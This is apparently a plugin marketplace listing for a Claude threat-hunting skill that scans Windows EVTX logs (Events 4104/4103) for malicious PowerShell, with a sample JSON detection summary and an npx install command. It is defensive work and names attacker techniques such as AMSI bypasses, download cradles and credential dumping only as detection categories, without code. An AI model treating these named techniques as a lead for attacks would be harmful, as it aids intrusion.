Stats
Actions
Tags
From cybersec-toolkit
Analyzes Windows EVTX files to detect malicious PowerShell activity including obfuscated commands, AMSI bypasses, encoded payloads, and credential dumping via Script Block Logging (Event 4104).
How this skill is triggered — by the user, by Claude, or both
Slash command
/cybersec-toolkit:hunting-for-anomalous-powershell-executionThe summary Claude sees in its skill listing — used to decide when to auto-load this skill
PowerShell Script Block Logging (Event ID 4104) records the full deobfuscated script text
PowerShell Script Block Logging (Event ID 4104) records the full deobfuscated script text executed on a Windows endpoint, making it the primary data source for hunting malicious PowerShell. Combined with Module Logging (4103) and process creation events, analysts can detect encoded commands, AMSI bypass patterns, download cradles, credential theft tools, and fileless attack techniques even when the attacker uses obfuscation layers.
{
"total_events": 1247,
"suspicious_events": 23,
"amsi_bypass_attempts": 2,
"encoded_commands": 8,
"download_cradles": 5,
"credential_access": 3
}
npx claudepluginhub 26zl/cybersec-toolkit --plugin cybersec-toolkitAnalyzes Windows EVTX files to detect malicious PowerShell activity including obfuscated commands, AMSI bypasses, encoded payloads, and credential dumping via Script Block Logging (Event 4104).
Parses Windows EVTX files for malicious PowerShell via Event 4104/4103 logs, detecting AMSI bypasses, obfuscated commands, encoded payloads, credential dumping, and download cradles. For threat hunting and incident analysis.
Hunts malicious PowerShell activity in Windows EVTX logs (events 4104/4103) by parsing script blocks, detecting obfuscation, AMSI bypasses, encoded payloads, credential dumps, and download cradles.